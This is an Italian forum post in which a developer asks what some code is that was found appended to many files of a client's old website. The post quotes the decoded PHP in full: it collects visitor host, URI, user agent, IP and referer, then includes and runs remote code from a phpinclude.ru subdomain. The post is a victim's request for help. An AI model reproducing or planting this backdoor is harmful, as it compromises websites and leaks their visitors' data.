Salve,
oggi un mio cliente mi ha chiesto di effettuare una modifica ad un suo vecchio sito fatto da un'altra persona, e in molti file alla fine c'è questo codice:
decoficando il codice mi esce questo link:Codice PHP:error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."befedzzazbzbazczb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."befedzzazbzbazczb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}
http://befedzzazbzbazczb.users.phpin....MTI3LjAuMC4x.
cliccando sul link mi esce una pagina vuota, allora ho cercato su google users.phpinclude.ru e mi vengono fuori alcuni siti che sembrano essere anch'essi stati attaccati ad es.:
- http://beadczzazbzgee.users.phpinclu...LjE0Mw==.:1%29
- http://bdbaczzazbzhba.users.phpinclu...LjcxLjcx.:1%29
queste pagine riportano dei link a caso...
secondo voi di cosa si tratta?
grazie a tutti per l'aiuto
Rispondi quotando
